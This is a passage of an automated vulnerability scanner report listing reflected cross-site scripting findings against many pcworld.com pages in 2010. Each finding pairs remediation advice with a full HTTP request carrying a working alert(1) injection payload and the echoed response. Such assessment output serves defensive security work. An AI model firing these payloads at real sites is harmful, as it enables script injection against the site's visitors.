The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c734'-alert(1)-'d366475ff4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /howto.html2c734'-alert(1)-'d366475ff4f HTTP/1.1
Accept: */*
Referer: http://www.pcworld.com/reviews.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.pcworld.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5DC1B2D79329169F915FFB0E63668B26; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:07 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
bject();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/howto.html2c734'-alert(1)-'d366475ff4f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.79. http://www.pcworld.com/news.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /news.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a73df'-alert(1)-'11714e371a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news.htmla73df'-alert(1)-'11714e371a2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.pcworld.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2D7C0E98EEA1A2EEACD3BB4DA31B2B2E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:22 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/news.htmla73df'-alert(1)-'11714e371a2';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.80. http://www.pcworld.com/newsletters/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /newsletters/index

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97226'-alert(1)-'106c5ce0535 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsletters/index97226'-alert(1)-'106c5ce0535 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44604C0DF7C9A5A3207C228BC5512D40; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:38 GMT
Connection: close
Vary: Accept-Encoding


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
;
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/newsletters/index97226'-alert(1)-'106c5ce0535';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.81. http://www.pcworld.com/register [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /register

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f34be'-alert(1)-'2ad0e3108ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /registerf34be'-alert(1)-'2ad0e3108ed HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A8EA4075B802BF0797D936C6BFF79782; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:04 GMT
Connection: close
Vary: Accept-Encoding


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/registerf34be'-alert(1)-'2ad0e3108ed';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.82. http://www.pcworld.com/resource/circ_subservices.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /resource/circ_subservices.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4447f'-alert(1)-'1b60d5542b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resource/circ_subservices.html4447f'-alert(1)-'1b60d5542b0 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:53:47 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:53:46 GMT
Connection: close
Vary: Accept-Encoding


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
rEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/circ_subservices.html4447f'-alert(1)-'1b60d5542b0';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.83. http://www.pcworld.com/resource/community.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /resource/community.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db99a'-alert(1)-'87c031c31ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resource/community.htmldb99a'-alert(1)-'87c031c31ef HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:55:37 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=36AAD9E825CE39060DC21821850E26F3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:55:37 GMT
Connection: close
Vary: Accept-Encoding


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
gon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/community.htmldb99a'-alert(1)-'87c031c31ef';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.84. http://www.pcworld.com/resource/contactus.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /resource/contactus.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b438'-alert(1)-'74a2100139 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resource/contactus.html1b438'-alert(1)-'74a2100139 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:54:47 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:47 GMT
Connection: close
Vary: Accept-Encoding


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
gon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/contactus.html1b438'-alert(1)-'74a2100139';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.85. http://www.pcworld.com/resource/idg_intl.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /resource/idg_intl.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 301a2'-alert(1)-'134a1de0d5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resource/idg_intl.html301a2'-alert(1)-'134a1de0d5e HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:55:45 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:55:44 GMT
Connection: close
Vary: Accept-Encoding


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
ogon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/idg_intl.html301a2'-alert(1)-'134a1de0d5e';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.86. http://www.pcworld.com/resource/privacy.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /resource/privacy.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebc0a'-alert(1)-'f10a965e835 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resource/privacy.htmlebc0a'-alert(1)-'f10a965e835 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:54:28 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=062610B67A0667ECB11F0AE6D0BC868B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:28 GMT
Connection: close
Vary: Accept-Encoding


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/privacy.htmlebc0a'-alert(1)-'f10a965e835';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.87. http://www.pcworld.com/resource/rss.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /resource/rss.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e602'-alert(1)-'2a353c7019e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resource/6e602'-alert(1)-'2a353c7019e HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:53:38 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=B5E652ED74ADE2EC5310961D14B7F6C8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:53:38 GMT
Connection: close
Vary: Accept-Encoding


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/6e602'-alert(1)-'2a353c7019e';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.88. http://www.pcworld.com/resource/site_faq.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /resource/site_faq.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9554b'-alert(1)-'4097796520d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resource/site_faq.html9554b'-alert(1)-'4097796520d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:54:42 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=2A7BE37C827B82A78784C692E9D1612A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:41 GMT
Connection: close
Vary: Accept-Encoding


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
ogon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/site_faq.html9554b'-alert(1)-'4097796520d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.89. http://www.pcworld.com/resource/termsofservice.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /resource/termsofservice.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9ee4'-alert(1)-'4120e7a2cc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resource/termsofservice.htmlf9ee4'-alert(1)-'4120e7a2cc3 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:53:57 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:53:57 GMT
Connection: close
Vary: Accept-Encoding


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
serEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/termsofservice.htmlf9ee4'-alert(1)-'4120e7a2cc3';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.90. http://www.pcworld.com/reviews.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21542'-alert(1)-'7ef1cbf5b68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews.html21542'-alert(1)-'7ef1cbf5b68 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.pcworld.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:13 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ect();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews.html21542'-alert(1)-'7ef1cbf5b68';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.91. http://www.pcworld.com/reviews/collection/1597/free_antivirus_software.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1597/free_antivirus_software.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de20'-alert(1)-'4b4ee45e9b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1597/free_antivirus_software.html6de20'-alert(1)-'4b4ee45e9b0 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:37 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1597/free_antivirus_software.html6de20'-alert(1)-'4b4ee45e9b0';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.92. http://www.pcworld.com/reviews/collection/1600/top_hd_pocket_camcorders.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1600/top_hd_pocket_camcorders.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9941f'-alert(1)-'9f0262078a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1600/top_hd_pocket_camcorders.html9941f'-alert(1)-'9f0262078a8 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8AFD0C136155BDFD46898090A9D77AB7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:49 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1600/top_hd_pocket_camcorders.html9941f'-alert(1)-'9f0262078a8';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.93. http://www.pcworld.com/reviews/collection/1602/top_10_digital_slr_cameras.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1602/top_10_digital_slr_cameras.html

Issue detail
